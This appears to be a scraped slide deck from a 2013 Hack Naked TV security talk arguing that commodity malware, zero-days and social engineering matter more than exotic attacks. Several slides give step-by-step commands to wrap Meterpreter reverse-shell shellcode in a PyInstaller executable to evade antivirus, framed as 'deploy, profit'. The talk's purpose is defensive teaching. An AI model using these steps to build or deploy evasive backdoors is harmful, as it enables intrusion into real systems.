View
823
Download
1
Category
Tags:
Preview:
Citation preview
http://hacknaked.tv Copyright 2013
The Need for Focus
• It is easy to get caught up in the latest “Hack of the day”
• Let’s talk about
• iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X
• But, when we get popped, it is going to be something simple
• Cool stuff is cool, but the basics will kill you
http://hacknaked.tv Copyright 2013
#1 Crappy Malware
• Had enough presentations on the “Not so advanced persistent threat?”
• Somehow, the belief is if we can make fun of the attackers skill level it makes us….???
• Better? Smarter?
• Why?
• Because…..
http://hacknaked.tv Copyright 2013
About that Malware
• It tends to be well known
• It tends to have AV signatures*
• Tracing it back to a specific group can be hard
• Anyone can download it
• It is not 1337 or even 31337
Just right
http://hacknaked.tv Copyright 2013
AV Bypass Made Easy
• Many of these tools have options to export to a raw string of hex characters
• In fact, that does not even matter• We can use Ghost
Writing techniques
• Simply exporting and re-importing as a script does the trick
• Flame did this with Lua
This and cookies:Why I pentest
http://hacknaked.tv Copyright 2013
Python Injection
• Another technique is to:
• Convert your payload into Raw output
• Import the Raw output into a python script
• Convert the Python script into an executable
• It is all because the text sections of an .exe not being reviewed by many AV vendors
• They would have to write the signature for Python itself
• Not likely
• Great write up by Mark Baggett
• http://tinyurl.com/SANS-580-Python-AV-Bypass
http://hacknaked.tv Copyright 2013
Windows AV Bypass - Setup
• Create a Windows box with prerequisites
• Same as target (32-bit vs. 64-bit)
• Install Python:http://www.python.org/
• Add Python to system PATH
• Install PyWin32:http://sourceforge.net/projects/pywin32/
• Install PyInstaller:http://www.pyinstaller.org/
• Download PyInjector:https://www.trustedsec.com/files/pyinjector.zip
http://hacknaked.tv Copyright 2013
Windows AV Bypass - Config
• Extract files from PyInjector
• Move pyinjector.py into root of PyInstaller folder
• Use msfpayload to generate alphanumeric shellcode (on any machine)
• msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more
• Make sure payload matches architecture!
• Within pyinjector.py:
• replace: shellcode = sys.argv[1]
• with: shellcode = '<msfpayload output>’
• where: <msfpayload output> = output from the above msfpayload command
http://hacknaked.tv Copyright 2013
Windows AV Bypass - Compile
• While in the PyInstaller Directory:• python utils\Makespec.py --onefile --noconsole pyinjector.py
• python utils\Build.py pyinjector/pyinjector.spec
• New backdoor should be under:• [PyInstaller]/pyinjector/dist/pyinjector.exe
• Rename the executable, deploy, profit
• Don’t forget your listener!!!
http://hacknaked.tv Copyright 2013
#2 0-day Dejour
• Yeah, another favorite for attackers
• There is always another 0-day
• Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective
• Why? Because it works
• They do a lot with volume
• What is your patch success percentage?
http://hacknaked.tv Copyright 2013
Lessons
• Black-list AV is easy to bypass
• In fact, we had to do it with Poison Ivy last week
• Yeah, a piece of malware 5 years old
• The attackers will be exactly as advanced as they need to be
• Which is not very advanced
http://hacknaked.tv Copyright 2013
Focus and Future Plans
• Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system
• Get away from Black List Security
• Now
• Right now
• .. I mean after this presentation
http://hacknaked.tv Copyright 2013
#3 Users Making “Mistakes”
• How could we have a presentation without this?
• There is no way hackers would be this successful without users
• Ha Ha!!! Users are “dumb”
• Yeah..
• Right?
• Not so fast sparky
http://hacknaked.tv Copyright 2013
We are all Dumb
• Or, the pretexts for the attackers are getting really, really good
• Some SE pretexts we use are not fair
• Major insurance company and a change of coverage
• Linked-in merit badges
• If the attack is tailored, it is successful
http://hacknaked.tv Copyright 2013
Hail Pentest Geek!
http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/
http://hacknaked.tv Copyright 2013
Lessons
• Users are going to make mistakes
• Not because they are dumb
• Well, half of them are below average
• Because they are not trained
• And because the attackers are good
http://hacknaked.tv Copyright 2013
Focus and Future Plans
• Hacker Guard Lesson: Once again, focus on attacker actions
• Limit the damage the user can do• Implement Firewalls
• Implement Software Restriction Policies
• Implement Internet Whitelisting
• But don’t simply believe the user is stupid
• Train them: Securing the Human
http://hacknaked.tv Copyright 2013
Conclusions
• While bright shiny objects are bright and shiny
• We need to come back to basics and fundamentals
• We loose sight of that in this industry
http://hacknaked.tv Copyright 2013
OCM at Black Hat
• Offensive Countermeasures at Black Hat 2013
• http://tinyurl.com/HNTV-BH-2013
http://hacknaked.tv Copyright 2013
End of Line
• Hack Naked TV Episodes
• http://www.hacknaked.tv
• Watch us:
• Blip.tv: http://blip.tv/securityweekly
• YouTube: http://youtube.com/securityweeklytv
• Subscribe via iTunes:• https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id1218
96233?mt=2
Recommended